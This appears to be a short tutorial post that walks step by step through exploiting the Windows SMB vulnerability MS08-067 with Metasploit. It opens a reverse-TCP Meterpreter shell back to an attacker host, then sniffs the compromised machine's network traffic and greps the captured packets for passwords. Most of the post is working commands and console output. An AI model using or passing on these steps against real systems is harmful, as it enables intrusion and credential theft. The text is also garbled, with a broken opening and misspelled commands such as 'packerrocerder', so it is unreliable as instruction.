Packet sniffing was never easy before. In the late 90's, we used tunneling, wire Shark, MITM and SSL Striping.After a payload of
all we need is to use exploit "
"I assume you have
opened and configured.Let's begin...Location and using Windows SMB exploit:msf > use exploit/windows/smb/ms08_067_netapi Setting payload of reverse_tcp:
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpeter/reverse_tcp
Setting local host for ping backs:
msf exploit(ms08_067_netapi) > set LHOST x.x.x.x
Setting target host:
msf exploit(ms08_067_netapi) > set RHOST x.x.x.x
And then fire:
msf exploit(ms08_067_netapi) > exploit
[*] Handler binding to LHOST 0.0.0.0[*] Started reverse handler[*] Triggering the vulnerability...[*] Transmitting intermediate stager for over-sized stage...(216 bytes)[*] Sending stage (205824 bytes)[*] Meterpreter session 1 opened (x.x.x.x:4444 -> x.x.x.x:1921)
Yes! We got our target under control.So now what? Just use sniffer.
meterpreter > use snifferLoading extension sniffer...success.
We can even see the sniffer option by pressing sniffer help. Let's start the sniffer:
eterpreter > sniffer_start 1[*] Capture started on interface 1 (200000 packet buffer)
Here we go...
meterpreter > sniffer_dump 1 /tmp/all.cap[*] Dumping packets from interface 1...[*] Wrote 19 packets to PCAP file /tmp/all.capmeterpreter > sniffer_dump 1 /tmp/all.cap[*] Dumping packets from interface 1...[*] Wrote 92 packets to PCAP file /tmp/all.cap
Success! We can cat and open this .cap file with winPcap and there's one more method for sniffing calledpacketRecorder in meterpreter (same as the sniffer). Just type:
meterpreter > use packerrocerder
You can see the options in the help section. All you need is to give him a path for our records.Before starting sniffing, we need to choose what the network interface should be for it.
meterpreter > run packetrecorder -li
After that, you're ready to fire...!
meterpreter > run packetrecorder -i 2 -l /root/[*] Starting Packet capture on interface 2[+] Packet capture started[*] Packets being saved in to /root/logs/packetrecorder/....
Again. we can use wireShark or winPcap to see our packets.Here, for wireshark, just locate your file and type this command:
tshark -r recordfilename.cap |grep PASSPASS : thisissecretPASS : thisiscaptured
-- Mutli Thinker